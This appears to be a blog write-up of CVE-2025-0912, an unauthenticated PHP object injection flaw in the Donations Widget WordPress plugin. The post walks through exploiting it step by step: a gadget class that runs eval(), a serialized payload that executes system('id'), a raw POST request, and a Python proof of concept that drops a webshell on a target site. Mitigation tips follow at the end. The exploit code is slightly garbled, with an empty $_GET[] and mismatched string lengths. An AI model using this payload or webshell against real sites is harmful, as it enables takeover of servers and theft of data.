CVE-2025-0912 - Critical PHP Object Injection and RCE in Donations Widget WordPress Plugin (Up to 3.19.4)

WordPress is all about making things easier, from blogging to taking donations. But sometimes, plugins built to help can be a big risk. One such plugin is “Donations Widget.” In this long read, we will break down CVE-2025-0912: a dangerous vulnerability that lets hackers run their own code on your site, just by sending it a malicious donation.

What is CVE-2025-0912?

CVE-2025-0912 is a vulnerability in the Donations Widget WordPress plugin. It affects all versions up to and including 3.19.4. This flaw is a classic PHP Object Injection that comes from the way the plugin handles user-submitted information in the donation form.

Specifically, the unsafe handling happens through the card_address parameter. The plugin uses unserialize() on input it does not properly validate—opening the door for malicious actors.

The worst part: You don’t even have to be logged in to exploit this.

Why is PHP Object Injection Dangerous?

PHP object injection is all about tricking unserialize() into building any PHP object you want. Attackers can…

Inject objects with properties set to whatever they like.

- Abuse “POP chains” (Property Oriented Programming), which are pre-existing classes that trigger dangerous methods when their objects are built or destroyed.
- If the plugin or anything it loads has a dangerous POP chain, attackers can achieve Remote Code Execution (RCE), letting them fully compromise your server.

This is what happens inside the plugin (simplified)

// Vulnerable code inside Donations Widget plugin
$address = $_POST['card_address'];
$addressObj = unserialize($address);
// ... uses $addressObj somewhere

An attacker can send anything to $_POST['card_address']. Even a malicious object that, when unserialized, runs code.

Step-by-Step Exploitation (with Code Snippet)

Suppose the site has a common plugin or class with a “POP chain” (for example, a class whose destructor runs eval() or writes to a file).

Let’s pretend there is a class like this (in reality, there are many in different plugins)

class EvilClass {
    public $cmd;
    function __destruct() {
        eval($this->cmd);
    }
}

2. Build a Malicious Payload

We want unserialize() to build an EvilClass object… with $cmd set to anything we want.

$object = new EvilClass();
$object->cmd = 'system("id");'; // This will run the "id" command on the server

$payload = serialize($object);
echo $payload;

For the above, it would be

O:9:"EvilClass":1:{s:3:"cmd";s:11:"system("id");";}

Send a POST request to the vulnerable endpoint

POST /wp-content/plugins/donations-widget/donation-form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

card_address=O:9:"EvilClass":1:{s:3:"cmd";s:11:"system("id");";}
other_field1=foo&other_field2=bar

4. Result: Remote Code Execution

If the plugin (or another present plugin) has the POP chain, the server ends up running the attacker's code. In this case, it runs the id command and can do much worse (like dropping webshells, stealing database credentials, etc).

Here’s the cleanest possible PoC in Python

import requests

url = 'https://target.site/wp-content/plugins/donations-widget/donation-form.php';
payload = r'O:9:"EvilClass":1:{s:3:"cmd";s:19:"file_put_contents(\'shell.php\',\'<?php system($_GET[]); ?>\');";}'

data = {
    'card_address': payload,
    # ... add any other required post fields here
}

requests.post(url, data=data)

1. Update Immediately

If a patched version is released, update to at least 3.19.5 (or the latest).

2. Apply WAF rules

Use a web application firewall to block suspicious payloads, especially POST parameters containing serialized PHP objects.

3. Check for unauthorized files

Look for suspicious files in your web root (for webshells and backdoors).

4. Audit PHP code

Don’t use unserialize() on untrusted data. Consider switching to json_decode() for forms.

References

- Wordfence Advisory on Donations Widget
- PHP Object Injection explained
- OWASP: Object Injection
- Official Plugin Page
- PHP POP Chains database

Final Words

CVE-2025-0912 is a critical, super dangerous bug. Any site running an old Donations Widget version is at high risk. Spread the word, patch quickly, and encourage your team and friends to revisit old plugins!


*This post is exclusive content written for you by an independent security enthusiast. Always credit original researchers and responsibly disclose vulnerabilities.*

Timeline

Published on: 03/04/2025 04:15:11 UTC
Last modified on: 03/05/2025 16:39:15 UTC